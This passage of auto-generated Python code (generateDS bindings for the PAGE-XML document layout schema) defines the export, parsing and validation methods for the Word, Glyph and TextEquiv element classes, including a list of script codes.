outfile.write(' production=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.production), input_name='production')), ))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='WordType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for AlternativeImage_ in self.AlternativeImage:
namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
if self.Coords is not None:
namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
for Glyph_ in self.Glyph:
namespaceprefix_ = self.Glyph_nsprefix_ + ':' if (UseCapturedNS_ and self.Glyph_nsprefix_) else ''
Glyph_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Glyph', pretty_print=pretty_print)
for TextEquiv_ in self.TextEquiv:
namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
if self.TextStyle is not None:
namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('language', node)
if value is not None and 'language' not in already_processed:
already_processed.add('language')
self.language = value
self.validate_LanguageSimpleType(self.language) # validate type LanguageSimpleType
value = find_attr_value_('primaryScript', node)
if value is not None and 'primaryScript' not in already_processed:
already_processed.add('primaryScript')
self.primaryScript = value
self.validate_ScriptSimpleType(self.primaryScript) # validate type ScriptSimpleType
value = find_attr_value_('secondaryScript', node)
if value is not None and 'secondaryScript' not in already_processed:
already_processed.add('secondaryScript')
self.secondaryScript = value
self.validate_ScriptSimpleType(self.secondaryScript) # validate type ScriptSimpleType
value = find_attr_value_('readingDirection', node)
if value is not None and 'readingDirection' not in already_processed:
already_processed.add('readingDirection')
self.readingDirection = value
self.validate_ReadingDirectionSimpleType(self.readingDirection) # validate type ReadingDirectionSimpleType
value = find_attr_value_('production', node)
if value is not None and 'production' not in already_processed:
already_processed.add('production')
self.production = value
self.validate_ProductionSimpleType(self.production) # validate type ProductionSimpleType
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'AlternativeImage':
obj_ = AlternativeImageType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AlternativeImage.append(obj_)
obj_.original_tagname_ = 'AlternativeImage'
elif nodeName_ == 'Coords':
obj_ = CoordsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Coords = obj_
obj_.original_tagname_ = 'Coords'
elif nodeName_ == 'Glyph':
obj_ = GlyphType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Glyph.append(obj_)
obj_.original_tagname_ = 'Glyph'
elif nodeName_ == 'TextEquiv':
obj_ = TextEquivType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextEquiv.append(obj_)
obj_.original_tagname_ = 'TextEquiv'
elif nodeName_ == 'TextStyle':
obj_ = TextStyleType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextStyle = obj_
obj_.original_tagname_ = 'TextStyle'
elif nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class WordType
class GlyphType(GeneratedsSuper):
"""The script used for the glyph
Overrides the production attribute of the parent
word / text line / text region.
For generic use"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('ligature', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('symbol', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('script', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('production', 'pc:ProductionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
MemberSpec_('Graphemes', 'GraphemesType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Graphemes', 'type': 'GraphemesType'}, None),
MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
]
subclass = None
superclass = None
def __init__(self, id=None, ligature=None, symbol=None, script=None, production=None, custom=None, comments=None, AlternativeImage=None, Coords=None, Graphemes=None, TextEquiv=None, TextStyle=None, UserDefined=None, Labels=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.ligature = _cast(bool, ligature)
self.ligature_nsprefix_ = None
self.symbol = _cast(bool, symbol)
self.symbol_nsprefix_ = None
self.script = _cast(None, script)
self.script_nsprefix_ = None
self.production = _cast(None, production)
self.production_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
if AlternativeImage is None:
self.AlternativeImage = []
else:
self.AlternativeImage = AlternativeImage
self.AlternativeImage_nsprefix_ = "pc"
self.Coords = Coords
self.Coords_nsprefix_ = "pc"
self.Graphemes = Graphemes
self.Graphemes_nsprefix_ = "pc"
if TextEquiv is None:
self.TextEquiv = []
else:
self.TextEquiv = TextEquiv
self.TextEquiv_nsprefix_ = "pc"
self.TextStyle = TextStyle
self.TextStyle_nsprefix_ = "pc"
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, GlyphType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if GlyphType.subclass:
return GlyphType.subclass(*args_, **kwargs_)
else:
return GlyphType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_AlternativeImage(self):
return self.AlternativeImage
def set_AlternativeImage(self, AlternativeImage):
self.AlternativeImage = AlternativeImage
def add_AlternativeImage(self, value):
self.AlternativeImage.append(value)
def insert_AlternativeImage_at(self, index, value):
self.AlternativeImage.insert(index, value)
def replace_AlternativeImage_at(self, index, value):
self.AlternativeImage[index] = value
def get_Coords(self):
return self.Coords
def set_Coords(self, Coords):
self.Coords = Coords
def get_Graphemes(self):
return self.Graphemes
def set_Graphemes(self, Graphemes):
self.Graphemes = Graphemes
def get_TextEquiv(self):
return self.TextEquiv
def set_TextEquiv(self, TextEquiv):
self.TextEquiv = TextEquiv
def add_TextEquiv(self, value):
self.TextEquiv.append(value)
def insert_TextEquiv_at(self, index, value):
self.TextEquiv.insert(index, value)
def replace_TextEquiv_at(self, index, value):
self.TextEquiv[index] = value
def get_TextStyle(self):
return self.TextStyle
def set_TextStyle(self, TextStyle):
self.TextStyle = TextStyle
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_ligature(self):
return self.ligature
def set_ligature(self, ligature):
self.ligature = ligature
def get_symbol(self):
return self.symbol
def set_symbol(self, symbol):
self.symbol = symbol
def get_script(self):
return self.script
def set_script(self, script):
self.script = script
def get_production(self):
return self.production
def set_production(self, production):
self.production = production
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def validate_ScriptSimpleType(self, value):
# Validate type pc:ScriptSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha (Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ProductionSimpleType(self, value):
# Validate type pc:ProductionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['printed', 'typewritten', 'handwritten-cursive', 'handwritten-printscript', 'medieval-manuscript', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ProductionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.AlternativeImage or
self.Coords is not None or
self.Graphemes is not None or
self.TextEquiv or
self.TextStyle is not None or
self.UserDefined is not None or
self.Labels
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GlyphType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('GlyphType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'GlyphType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GlyphType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GlyphType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GlyphType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.ligature is not None and 'ligature' not in already_processed:
already_processed.add('ligature')
outfile.write(' ligature="%s"' % self.gds_format_boolean(self.ligature, input_name='ligature'))
if self.symbol is not None and 'symbol' not in already_processed:
already_processed.add('symbol')
outfile.write(' symbol="%s"' % self.gds_format_boolean(self.symbol, input_name='symbol'))
if self.script is not None and 'script' not in already_processed:
already_processed.add('script')
outfile.write(' script=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.script), input_name='script')), ))
if self.production is not None and 'production' not in already_processed:
already_processed.add('production')
outfile.write(' production=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.production), input_name='production')), ))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GlyphType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for AlternativeImage_ in self.AlternativeImage:
namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
if self.Coords is not None:
namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
if self.Graphemes is not None:
namespaceprefix_ = self.Graphemes_nsprefix_ + ':' if (UseCapturedNS_ and self.Graphemes_nsprefix_) else ''
self.Graphemes.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Graphemes', pretty_print=pretty_print)
for TextEquiv_ in self.TextEquiv:
namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
if self.TextStyle is not None:
namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('ligature', node)
if value is not None and 'ligature' not in already_processed:
already_processed.add('ligature')
if value in ('true', '1'):
self.ligature = True
elif value in ('false', '0'):
self.ligature = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('symbol', node)
if value is not None and 'symbol' not in already_processed:
already_processed.add('symbol')
if value in ('true', '1'):
self.symbol = True
elif value in ('false', '0'):
self.symbol = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('script', node)
if value is not None and 'script' not in already_processed:
already_processed.add('script')
self.script = value
self.validate_ScriptSimpleType(self.script) # validate type ScriptSimpleType
value = find_attr_value_('production', node)
if value is not None and 'production' not in already_processed:
already_processed.add('production')
self.production = value
self.validate_ProductionSimpleType(self.production) # validate type ProductionSimpleType
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'AlternativeImage':
obj_ = AlternativeImageType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AlternativeImage.append(obj_)
obj_.original_tagname_ = 'AlternativeImage'
elif nodeName_ == 'Coords':
obj_ = CoordsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Coords = obj_
obj_.original_tagname_ = 'Coords'
elif nodeName_ == 'Graphemes':
obj_ = GraphemesType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Graphemes = obj_
obj_.original_tagname_ = 'Graphemes'
elif nodeName_ == 'TextEquiv':
obj_ = TextEquivType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextEquiv.append(obj_)
obj_.original_tagname_ = 'TextEquiv'
elif nodeName_ == 'TextStyle':
obj_ = TextStyleType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextStyle = obj_
obj_.original_tagname_ = 'TextStyle'
elif nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class GlyphType
class TextEquivType(GeneratedsSuper):
"""Used for sort order in case multiple TextEquivs are defined.
The text content with the lowest index should be interpreted
as the main text content.
OCR confidence value (between 0 and 1)
Type of text content (is it free text or a number, for instance).
This is only a descriptive attribute, the text type
is not checked during XML validation.
Refinement for dataType attribute. Can be a regular expression, for
instance."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('index', 'indexType', 0, 1, {'use': 'optional'}),
MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('dataType', 'pc:TextDataTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('dataTypeDetails', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('PlainText', 'string', 0, 1, {'minOccurs': '0', 'name': 'PlainText', 'type': 'string'}, None),
MemberSpec_('Unicode', 'string', 0, 0, {'name': 'Unicode', 'type': 'string'}, None),
]
subclass = None
superclass = None
def __init__(self, index=None, conf=None, dataType=None, dataTypeDetails=None, comments=None, PlainText=None, Unicode=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.index = _cast(int, index)
self.index_nsprefix_ = None
self.conf = _cast(float, conf)
self.conf_nsprefix_ = None
self.dataType = _cast(None, dataType)
self.dataType_nsprefix_ = None
self.dataTypeDetails = _cast(None, dataTypeDetails)
self.dataTypeDetails_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
self.PlainText = PlainText
self.PlainText_nsprefix_ = None
self.Unicode = Unicode
self.Unicode_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TextEquivType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TextEquivType.subclass:
return TextEquivType.subclass(*args_, **kwargs_)
else:
return TextEquivType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_PlainText(self):
return self.PlainText
def set_PlainText(self, PlainText):
self.PlainText = PlainText
def get_Unicode(self):
return self.Unicode
def set_Unicode(self, Unicode):
self.Unicode = Unicode
def get_index(self):
return self.index
def set_index(self, index):
self.index = index
def get_conf(self):
return self.conf
def set_conf(self, conf):
self.conf = conf
def get_dataType(self):
return self.dataType
def set_dataType(self, dataType):
self.dataType = dataType
def get_dataTypeDetails(self):
return self.dataTypeDetails
def set_dataTypeDetails(self, dataTypeDetails):
self.dataTypeDetails = dataTypeDetails
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def validate_indexType(self, value):
# Validate type indexType, a restriction on integer.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, int):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (int)' % {"value": value, "lineno": lineno, })
return False
if value < 0:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on indexType' % {"value": value, "lineno": lineno} )
result = False
def validate_ConfSimpleType(self, value):
# Validate type pc:ConfSimpleType, a restriction on float.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, float):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
return False
if value < 0:
lineno = self.gds_get_node_lineno_()
